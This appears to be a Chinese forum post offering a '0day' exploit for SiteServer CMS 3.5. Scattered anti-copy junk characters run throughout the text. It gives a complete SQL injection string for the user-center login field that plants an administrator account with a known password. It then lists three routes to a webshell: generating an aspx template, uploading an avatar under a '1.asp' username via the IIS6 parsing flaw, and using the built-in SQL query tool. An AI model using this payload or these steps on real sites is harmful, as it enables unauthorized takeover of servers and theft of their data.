SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
: |4 I* K. T  k; \. t
1 V& w# l6 ~: V+ w& ]stieserver官网:www.siteserver.cn
5 i2 a  {- a5 C' Y9 X7 p, ]) C/ p


' ~. E& J3 C  {4 oEXP:

2 o$ R. [+ s6 p6 b# s6 `" F  \直接访问UserCenter/login.aspx

! h- H5 `# ~& N( b* m
; N& E( F/ y$ ?- ?" i9 Q
; n$ T3 ?+ }4 O" J* h; G用户名处输入：
6 {! W: s2 F* B
0 g2 p7 f2 E+ u) L3 C" I. G8 t123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
' r" |6 H" d5 F2 g; e7 P; u


  Q, h9 O+ d1 I4 J* i9 h密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
4 O8 c* O  K2 C5 N3 T& E+ h


$ w. f: @; V! W5 `之后再访问后台SiteServer/login.aspx用插入的用户登陆
  d5 z1 X- D$ r! A
$ s& [$ l/ W: s- w" f

2 ?  b8 w3 f# |7 q3 |1 y  S* G4 m后台拿webshell的三种方法：
$ U1 P- Z$ V9 ~4 m4 S: \5 @
一、
$ x& {9 E& }5 o6 K
4 P; e6 p3 j$ B0 x) o站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
; V  `. f/ s0 y# Q
二、
$ x; X5 V/ i* w& ?/ g1 b5 {% r; G
5 B) J( ]& ~, }8 N2 G& p& q( U, z4 e成员权限-》添加用户-》用户名为：1.asp

8 ]0 J3 }5 g: k2 N1 ~0 fhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
8 _0 W' P1 H+ i1 @3 I# b. I
（ps：后台添加用户时不会验证是否含有非法字符）
+ q* _  B4 h0 R. e
4 ?3 p3 S8 V# @3 R; K8 ~+ [( F三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
( U1 P1 s1 D/ b
' D# m0 ?  i+ A系统工具-》数据库工具-》SQL语句查询
' y" h6 ^$ C1 J, ?这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
9 j0 d+ @: K& }